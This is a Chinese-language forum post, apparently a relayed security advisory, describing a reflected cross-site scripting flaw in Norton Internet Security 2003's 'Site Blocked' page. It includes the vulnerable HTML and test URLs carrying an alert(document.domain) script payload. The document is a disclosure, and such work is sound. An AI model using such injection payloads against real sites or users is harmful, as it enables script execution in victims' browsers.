人不機車罔少年~機 | 【警告】Symantec Norton Internet Security 漏洞 Symantec Norton Internet Security 漏洞 受影響系統: Symantec Internet Security 2003 Norton Internet Security 是 Symantec 公司開發網路防護系統,其核心是獨立的 Norton Personal Firewall 2003。 遠端攻擊者可以利用這個漏洞進行跨站攻擊,可能獲得用戶敏感資訊。 當 Norton Internet Security 2003 攔截到某個 WEB 網站時,會聲明此站已經被攔截,這個錯誤消息包含所有的 URL 資訊。 <html><head><title>Site Blocked</title></head><body> <br><b>Norton Internet Security has blocked access to this restricted site.</b><br><hr><br> <p><b>Site: </b>http://server/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT></p> <p><b>Blocked categories: </b>xxxxxxxxx</p> <p>If you think this web site is incorrectly categorized, visit the Symantec <a href="http://www.symantec.com/avcenter/cgi-bin/nisurl.cgi?lang=EN&unblock=xxxxxxxxx">Internet Security Center</a> to report it.</p> </body></html> 測試方法: http://BlockedSite/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT> http://www.example.com/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT> 會執行 script. |
回覆 |
|
類似的主題 | ||||
主題 | 主題作者 | 討論版 | 回覆 | 最後發表 |
【教學】適用於 Norton Internet Security 的 Norton Add-On Pack下載 | 天氣預報 | -- 防 駭 / 防 毒 版 | 5 | 2007-08-21 12:29 AM |
【警告】SYMANTEC 賽門鐵客 VPN 漏洞 | TAIWAN | -- 防 駭 / 防 毒 版 | 0 | 2004-08-16 09:15 PM |
【警告】預告 賽門鐵克 Internet Security 2004 漏洞 | TAIWAN | -- 防 駭 / 防 毒 版 | 8 | 2004-03-31 11:33 AM |
關於 norton internet security ? | jeswang | -- 防 駭 / 防 毒 版 | 1 | 2001-10-10 02:41 PM |
Norton Internet security 的問題 | tcshen | -- 防 駭 / 防 毒 版 | 3 | 2001-06-26 11:15 PM |
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。